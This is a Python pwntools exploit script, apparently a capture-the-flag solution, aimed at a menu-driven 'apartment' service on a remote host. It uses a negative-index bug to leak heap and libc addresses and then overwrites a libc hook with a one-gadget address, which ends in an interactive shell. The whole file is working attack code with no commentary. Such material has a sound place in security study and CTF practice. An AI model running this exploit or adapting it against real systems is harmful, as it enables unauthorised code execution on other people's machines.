from pwn import *

#s = remote('192.168.43.130',1234)
s = remote('200.200.200.103', 51015)
def apart(name,floor,house,des):
  s.recvuntil('>')
  s.send('1\n')
  s.recvuntil('name?')
  s.send(name+'\n')
  s.recvuntil('apartment?')
  s.send(str(floor)+'\n')
  s.recvuntil('floor?')
  s.send(str(house)+'\n')
  s.recvuntil('it :')
  s.send(des+'\n')
def manage_change(src_type,index,dest_type):
  s.recvuntil('>')
  s.send('4\n')
  s.recvuntil('>')
  s.send('2\n')
  s.recvuntil('>')
  s.send(str(src_type)+'\n')
  s.recvuntil('>')
  s.send(str(index)+'\n')
  s.recvuntil('>')
  s.send(str(dest_type)+'\n')
def manage_for_leak(index):
  s.recvuntil('>')
  s.send('1\n')
  s.recvuntil('>')
  s.send('3\n')
  s.recvuntil('>')
  s.send(str(index)+'\n')

apart('A'*8,1234,1234,'AAAA')
apart('A'*8,1234,1234,'AAAA')
manage_change(1,1,2)
s.recvuntil('>')
s.send('-1\n')
manage_for_leak(1)
heap = int(s.recvuntil('Normal price of pay')[0x76+4:0x84+4],10)
log.info('HEAP : 0x%x'%heap)
# overwrite
s.recvuntil('>')
s.send('6\n')
s.recvuntil('menu :')
s.send(str(heap+0x1e8)+'\n')
s.recvuntil('>')
s.send('1\n')
s.recvuntil('name :')
s.send('A'*0x100+'\n')
#leak
s.recvuntil('>')
s.send('-1\n')
s.recvuntil('>')
s.send('1\n')
libc = u64(s.recvuntil('>')[4:-2]) - 0x3c3b78
log.info('LIBC : 0x%x'%libc) 
s.send('-1\n')
#overwrite
s.recvuntil('>')
s.send('3\n')
s.recvuntil('>')
s.send('1\n')
s.recvuntil('>')
s.send('6\n')
s.recvuntil('menu :')
s.send(str(libc+0x3c3b10)+'\n')

s.recvuntil('>')
s.send('-1\n')
s.recvuntil('>')
s.send('1\n')
s.recvuntil('>')
s.send('1\n')
s.recvuntil('>')
s.send('1\n')
s.recvuntil('name :')
s.send(p64(libc+0xef6c4)[:-1]+'\n')
s.interactive()
